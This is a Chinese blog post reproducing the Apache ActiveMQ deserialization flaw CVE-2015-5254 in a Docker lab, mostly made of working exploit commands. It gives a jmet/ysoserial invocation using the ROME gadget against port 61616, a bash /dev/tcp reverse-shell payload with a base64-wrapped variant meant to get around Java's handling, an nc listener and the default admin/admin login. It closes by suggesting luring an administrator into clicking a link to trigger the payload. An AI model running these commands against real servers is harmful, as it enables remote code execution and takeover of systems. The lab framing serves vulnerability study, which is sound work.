zoukankan      html  css  js  c++  java
  • ActiveMQ 反序列化漏洞(CVE-2015-5254)复现

    ActiveMQ 反序列化漏洞(CVE-2015-5254)

    Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

    Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

    参考链接:

    - https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf

    ## 漏洞环境

    运行漏洞环境:

    ```
    docker-compose up -d
    ```

    环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问`http://target-ip:8161`即可看到web管理页面,不过这个漏洞理论上是不需要web的。

    ## 漏洞复现

    漏洞利用过程如下:

    1. 构造(可以使用ysoserial)可执行命令的序列化对象
    2. 作为一个消息,发送给目标61616端口
    3. 访问web管理页面,读取消息,触发漏洞

    使用[jmet](https://github.com/matthiaskaiser/jmet)进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

    工具下载地址:
    wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

    jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

    执行:

    ```
    java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME target-ip 61616
    ```

    此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过`http://target-ip:8161/admin/browse.jsp?JMSDestination=event`看到这个队列中所有消息:

    # ActiveMQ 后台管理地址
    http://192.168.61.132:8161/admin/
    默认账号:admin
    默认密码:admin

    点击查看这条消息即可触发命令执行,此时进入容器`docker-compose exec activemq bash`,可见/tmp/success已成功创建,说明漏洞利用成功:

    将命令替换成弹shell语句再利用:
    payload: bash -i >& /dev/tcp/my-ip/8888 0>&1

    经测试以上payload未执行成功,需对该payload进行base64编码,绕过java检测机制
    新payload: bash -c {echo,payload进行base64编码}|{base64,-d}|{bash,-i}

    java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,payload进行base64编码}|{base64,-d}|{bash,-i}" -Yp ROME target-ip 61616

    监听本地 8888 端口,查看消息触发命令执行
    nc -l -p 8888

     移除漏洞环境:

    ```
    docker-compose down --remove
    ```

    值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。

  • 相关阅读:
    一个完整的移动端项目的构建步骤——框架搭构1
    简单日历,纯js
    javascript语句语义大全(7)
    微软笔试Highway问题解析
    中国电信翼支付2014编程大赛决赛
    海岛问题
    大数计算
    Dijkstra算法
    Android测试之Keycode
    字符串解析
  • 原文地址:https://www.cnblogs.com/panisme/p/12531802.html
Copyright © 2011-2022 走看看